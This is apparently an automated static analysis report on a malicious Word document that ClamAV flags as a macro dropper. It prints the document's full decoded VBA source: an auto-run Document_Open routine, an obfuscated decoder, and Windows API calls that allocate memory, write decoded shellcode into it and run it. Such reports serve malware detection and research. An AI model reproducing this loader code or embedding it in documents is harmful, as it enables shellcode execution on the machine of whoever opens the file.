Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 62e6e5dc0c3927a8…

MALICIOUS

Office (OLE)

193.5 KB Created: 2017-03-15 13:02:00 Authoring application: Microsoft Office Word First seen: 2018-07-04
MD5: bbd821ba3da93a4787d74d233d23e852 SHA-1: 6a0d0b91c6d5814e8b0b9f94ee27aceb7ff39d33 SHA-256: 62e6e5dc0c3927a8c5d708688ca2b56df93848b15a4c38aab173c5a8384395f9
90 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature 'Doc.Dropper.ZwMacros-6057750-0', indicating it's a macro-based dropper. The presence of a 'Document_Open' macro and extensive VBA code further supports this, suggesting the macros are intended to download and execute a secondary payload. The obfuscated nature of the VBA code prevents a more detailed analysis of its specific actions.

Heuristics 4

  • ClamAV: Doc.Dropper.ZwMacros-6057750-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    Dim afeard As Variant
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13893 bytes
SHA-256: 2b9448538e558439b73ec4fbf619e22cee68b131a4885e17b903097818c2e72a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub bubaline()
Dim daughterly As Integer
Dim embezzled As Variant
lassoo.rose.Value = Day(#12/5/2007#)
drunkenness = "elderly"
plataleidae = "chickadee"
Set bigamist = lassoo.rose.SelectedItem
mollify = 35
mbabane = 29167
alpestrine = 598047
 VBA.NPer 0, mollify, 15824, 26380, 6

diaphysis = bigamist.Name
cargo = 5828
placement = Right(diaphysis, cargo)
libel = dactyloctenium.dispenser(placement)
aborning = 111
marginally = 27117
benthos = 563654
 VBA.NPer 0, aborning, 9539, 16474, 7

pennyroyal = "degressive"
#If Win64 Then
Dim finedraw As Byte
Dim newsless As LongPtr
Dim beriberi As LongPtr
Dim sugarloaf As String
#Else
Dim nobler As Integer
Dim beriberi As Long
Dim acholia As Variant
Dim newsless As Long
#End If
pisum = 125 + 14 + 120 - 259
gybe = "nonresonant"
portugal = boric
mosquitofish = 4096
deiodinating = 19
heavendirected = 4503
asuncion = 563868
 VBA.NPer 0, deiodinating, 36397, 51222, 4

betty = bloodyminded
cain = "castaneous"
brickyard = "cullibility"
harrier = 87
alumnus = 36554
antithetically = 414881
 VBA.NPer 0, harrier, 7318, 34248, 6

carelessly = libel
pome = "unairworthy"
facilitate = "hunted"
newsless = herbarist(carelessly)
dooly = "accommodate"
#If Win64 Then
Dim factor As Integer
Dim liliales As LongPtr
Dim redoundto As LongPtr
Dim organon As LongPtr
estrilda = 67 - 98 - 75 + 1418
#Else
Dim liliales As Long
millwheel = 80 + 415
Dim redoundto As Long
Dim organon As Long
estrilda = millwheel + 2657

#End If
Dim affirmativeness As String
Dim hemingwayesque As String
liliales = 0
beriberi = newsless + estrilda
redoundto = 55 - 60 + 201532
organon = 3500
newsroom = grount(redoundto, liliales, beriberi, liliales, liliales, liliales, liliales)
divinum = 44
scurry = 23946
unalluring = 268503
 VBA.NPer 0, divinum, 33149, 46504, 5

End Sub

Function herbarist(metalepsis)
Dim meticulous As Integer
Dim worldwideness As String
Dim noiselessness As String
Dim balloon As Integer
#If Win64 > 0 Then
Dim bushel As Long
Dim punicaceae As LongPtr
chateaux = 74 + 82 - 148
Dim underage As LongPtr
Dim antigram As Variant
Dim mopish As Long
Dim abdication As LongPtr
Dim ageratina As Variant
#Else
Dim distinction As String
Dim punicaceae As Long
chateaux = 101 + 17 - 114
Dim underage As Long
Dim barrack As String
Dim abdication As Long
Dim unimitated As String
Dim rama As Long
#End If
highlander = VarPtr(punicaceae)
burglary = reminiscence(highlander, VarPtr(metalepsis) + 8, chateaux)
excursive = -1
underage = 0
personableness = 0
abdication = 9670
catalepsy = 4096
ibuprofen = 64
cowpens = asperity(ByVal excursive, underage, ByVal personableness, abdication, ByVal catalepsy, ByVal ibuprofen)
cration = "dapple"

deportment = Fix(284)

reminiscence underage, punicaceae, 4370
chiefdom = 71
inchon = 22602
paternal = 289514
 VBA.NPer 0, chiefdom, 20479, 37527, 8

herbarist = underage
End Function
Function reminiscence(viatical, adductor, learn)
#If Win64 Then
Dim pilon As Integer
Dim anorthite As Byte
Dim adenography As LongPtr
Dim blackandblue As LongPtr
Dim uraninite As LongPtr
Dim folio As Long
Dim ductule As LongPtr
Dim pinckneya As LongPtr
#Else
Dim blackandblue As Long
Dim morbidity As String
Dim adenography As Long
Dim anecdotist As Long
Dim ductule As Long
Dim neurasthenic As String
Dim uraninite As Long
Dim champleve As Variant
Dim pinckneya As Long
Dim incase As Variant
Dim peccant As Byte
#End If
cadmiumyellow = Fix(331)
curbside = deportment Or 55
blackandblue = viatical
pinckneya = learn
cration = cration
ductule = adductor
alight = 98
camphoraceous = 25669
conductive = 300043
 VBA.NPer 0, alight, 39627, 23426, 4

unretracted = bloodstained
adenography = 94 - 35 - 60
avast ByVal adenography, blackandblue, ductule, pinckneya, uraninite
deportment = bateau And 140
End Function
Sub max()
    With Documents("Example.doc").Windows(1)
        If .WindowState = wdWindowStateMinimize Then _
            .WindowState = wdWindowStateMaximize
    End With
End Sub

Private Sub Document_Open()
Dim afeard As Variant
Dim pieridae As Variant
predesigned = "extrados"
escritoire = "decorous"
bubaline
butadiene = 82
intrasentential = 12165
dandiprat = 258935
 VBA.NPer 0, butadiene, 32751, 45510, 5
End Sub


Attribute VB_Name = "dactyloctenium"
'  In the age of greed, the age of need mother earth
'  We're lost, we're killing children in the name of
#If Win64 Then
'  Would I tell you good-by or would I defend you through fire?
'  In the age of greed, the age of need mother earth
Public  Declare PtrSafe Function grount Lib "Kernel32" Alias "CreateTimerQueueTimer" (flannelbush As Any, ByVal consenting As Any, ByVal styleless As Any, ByVal sight As Any, ByVal horsepower As Any, ByVal infusible As Any, ByVal pacify As Any) As Long
'  Karma's a bitch and I feel her breath on my neck kid
'  I go for mine and you go for yours
Public Declare PtrSafe Function purblindness Lib "Shlwapi.dll" Alias "PathFileExists" (jaculus As LongPtr) As LongPtr
'  Would I tell you good-by or would I defend you through fire?
'  And still I had to burn some bridges cause somehow it
Public Declare PtrSafe Function avast Lib "Ntdll.dll  " Alias "ZwWriteVirtualMemory" (ByVal airfoil As Any, ByVal sus As Any, ByVal concordiam As Any, ByVal unenthusiastically As Any, ByVal caesura As Any) As LongPtr
'  Then hate multiplies and we lose it all.
'  Bin Laden's not gonna stop it evolving
Public Declare PtrSafe Function unallied Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (gulp As LongPtr, varied As Any,comfrey As LongPtr, adversum As Any) As Boolean
'  I hate to look in the mirror
'  But life's a too long road to walk alone though
Public Declare PtrSafe Function asperity Lib "ntdll.dll  " Alias "NtAllocateVirtualMemory" (spirometer As LongPtr, amphisbaenidae As LongPtr, ByVal bobble As LongPtr,provedByVal As LongPtr, featherbedding As LongPtr, ByVal disunion As LongPtr) As LongPtr
'  I look in the mirror trying to see a better man
'  What I was blessed with
Public Declare PtrSafe Function centaury Lib "ntdll.dll" Alias "NtDeleteAtom" (deliriously As LongPtr)
'  And still I had to burn some bridges cause somehow it
'  But life's a too long road to walk alone though
Public Declare PtrSafe Function inflammatory Lib "ntdll.dll" Alias "NtContinue" (habited As LongPtr,arriving As LongPtr,significance As LongPtr) As LongPtr
'  Lost souls speaking chat-room morse-code
'  A poor set of cards a poor number of jobs
Public Declare PtrSafe Function shareware Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal methicillin As LongPtr,conscription As LongPtr,meryta As LongPtr,avantcourier As LongPtr,kedgeree As LongPtr) As Boolean
'  If I close my eyes and you close your door
'  With are selfless

'  But life's a too long road to walk alone though
'  Would I carry your weight,
#Else
'  A poor set of cards a poor number of jobs
'  Or say have it your way?
Public Declare Function beautician Lib "Shlwapi.dll" Alias "PathFileExists" (likewise As Long) As Long
'  No man is an island, I'll be damned if I'm lying
'  I look in the mirror trying to see a better man
Public Declare Function asperity Lib "Ntdll.dll " Alias "NtAllocateVirtualMemory" (moneses As Long, uneconomical As Long, ByVal eos As Long, amphineuraByVal As Long, gutted As Long, ByVal dispart As Long) As Long
'  I go for mine and you go for yours
'  Would I tell you good-by or would I defend you through fire?
Public Declare Function allopurinol Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal helps As Long, silk As Long, muishond As Long, hurry As Long, chalcostigma As Long) As Boolean
'  I go for mine and you go for yours
'  Would I tell you good-by or would I defend you through fire?
Public Declare Function psidium Lib "ntdll.dll" Alias "NtDeleteAtom" (boarfish As Long)
'  I go for mine and you go for yours
'  Would I tell you good-by or would I defend you through fire?
Public Declare Function campestrine Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (celtic As Long, dictatorial As Any, waterlogged As Long, praline As Any) As Boolean
'  I go for mine and you go for yours
'  Would I tell you good-by or would I defend you through fire?
Public Declare Function czechoslovakia Lib "ntdll.dll" Alias "NtContinue" (handily As Long, chains As Long, brittlebush As Long) As Long
'  I go for mine and you go for yours
'  Would I tell you good-by or would I defend you through fire?
Public Declare Function grount Lib "Kernel32" Alias "CreateTimerQueueTimer" (amended As Any, ByVal unrefreshed As Any, ByVal avellan As Any, ByVal appetize As Any, ByVal onoclea As Any, ByVal polystyrene As Any, ByVal pintsize As Any) As Long
'  I go for mine and you go for yours
'  Would I tell you good-by or would I defend you through fire?
Public Declare Function avast Lib "Ntdll.dll   " Alias "ZwWriteVirtualMemory" (ByVal mesophytic As Any, ByVal ambidextral As Any, ByVal elementary As Any, ByVal cardiospasm As Any, ByVal diagrammatically As Any) As Long
'  I go for mine and you go for yours
'  Would I tell you good-by or would I defend you through fire?

'  And still I had to burn some bridges cause somehow it
'  Lot of people got dealt with,
#End If
'  Bin Laden's not gonna stop it evolving
'  I'm generating my money, they aint taking my money
Function airmanship()
Dim thamnophilus(255) As Byte
doxy = 24 + 41
Do
thamnophilus(doxy) = doxy - 65
doxy = doxy + 1
Loop Until doxy = 91
doxy = 48
Do
thamnophilus(doxy) = doxy + 4
doxy = doxy + 1
Loop Until doxy = 58
doxy = 97
Do
thamnophilus(doxy) = doxy - 71
doxy = doxy + 1
Loop Until doxy = 123
thamnophilus(47) = 63
doxy = 43
thamnophilus(doxy) = 62
airmanship = thamnophilus
End Function
Function attacker(barosaur, inexorable, andesite)
Select Case andesite
Case 44
attacker = barosaur \ inexorable
Case 54
attacker = barosaur And inexorable
Case 62
attacker = barosaur * inexorable
End Select
End Function
Function bundledup(bissau)
bundledup = AscW(bissau)
End Function
Sub IterateOpenForms()
    Dim frm As Form
    
    For Each frm In Forms
        'Print the name of the referenced form to the Immediate window
        Debug.Print frm.Name
    Next frm
End Sub

Function dispenser(blameworthy) As String
Dim tussilago As Long

Dim rimiform As Long
Dim superabundance(63) As Long
bateau = Math.Round(84)

Dim thallus As String

Dim ahura(63) As Long
curbside = Fix(146)

Dim flowmeter As String

Dim ribbed As Integer
Dim eurasia As String
bateau = Rnd(372)

Dim aepyorniformes As Long
Dim preraphaelite As Long
Dim silentio As Long

Dim spleenly(6962) As Byte
Dim gymnadenia(63) As Long
Dim gobbledygook() As Byte
Dim hearsay As Long
unprovable = 19 - 64 - 76 + 377
haemanthus = 63
cacicus = 10 + 62 + 3960
Dim argyreia As String

barometric = 60 + 93 + 65383
retem = 16711680
hydrocarbon = 64
Dim booklouse As Variant

autotomic = 16515072
porthole = 6 + 9 + 4081
rutabaga = 81 - 51 + 258018
beryllium = 65280
Dim metalloid As Variant

biopsy = 67 + 262077
ironical = 123 - 95 - 73 + 300
Dim hearing As Integer
fumariaceae = 0
calorifacient = 11 + 5816
Dim eos() As Byte
Dim carlyle As Byte
Dim cornetapistons As String
eos = StrConv(blameworthy, 128)
Dim gnu As Integer
aghan = 38
chandlery = 37055
alveolitis = 434442
 VBA.NPer 0, aghan, 34621, 15328, 2

unbridgeable = 5827
beseech = vbKeyShift - 12
For devils = 0 To unbridgeable
If devils Mod 2 = 0 Then
eos(devils) = eos(devils) - beseech
Else
eos(devils) = eos(devils) - (beseech - 1)
End If
Next devils
boise = 111
pectinated = 33852
abetalipoproteinemia = 227594
 VBA.NPer 0, boise, 20090, 59662, 6

ribbed = 0
antineoplastic = 128 + 78 - 69 - 137
political = 43
eruditeness = airmanship
For aepyorniformes = 0 To 63
superabundance(aepyorniformes) = attacker(aepyorniformes, hydrocarbon, 62)
gymnadenia(aepyorniformes) = attacker(aepyorniformes, porthole, 62)
ahura(aepyorniformes) = attacker(aepyorniformes, biopsy, 62)
Next aepyorniformes
choice = 100
marbling = 30694
antiproton = 496927
 VBA.NPer 0, choice, 12758, 31486, 4

gobbledygook = eos
choky = 108 - 33 - 71
genital = 72
reappraisal = 21770
critter = 246606
 VBA.NPer 0, genital, 17991, 12395, 6

fang = 123 + 118 - 44 - 194
cration = "dixit"

semicolon = bloodstained

furled = fang + 1
empyreumatic = 23 - 103 - 112 + 194
For hearsay = 0 To unbridgeable
interphone = gobbledygook(hearsay)
cluster = gobbledygook(hearsay + 2)
rimiform = ahura(eruditeness(interphone)) _
 + gymnadenia(eruditeness(gobbledygook(hearsay + 1))) + superabundance(eruditeness(cluster)) + eruditeness(gobbledygook(hearsay + fang))
aepyorniformes = attacker(rimiform, retem, 54)
spleenly(preraphaelite) = attacker(aepyorniformes, barometric, 44)
aepyorniformes = attacker(rimiform, beryllium, 54)
spleenly(preraphaelite + 1) = attacker(aepyorniformes, unprovable, 44)
spleenly(preraphaelite + empyreumatic) = attacker(rimiform, ironical, 54)
preraphaelite = preraphaelite + empyreumatic + 1
hearsay = hearsay + 3
Next
dispenser = spleenly
End Function



Attribute VB_Name = "lassoo"
Attribute VB_Base = "0{900AB79B-87A8-4F9B-B587-D99536141F74}{E3428541-6E9B-4542-9F06-0F44C01CE8A1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False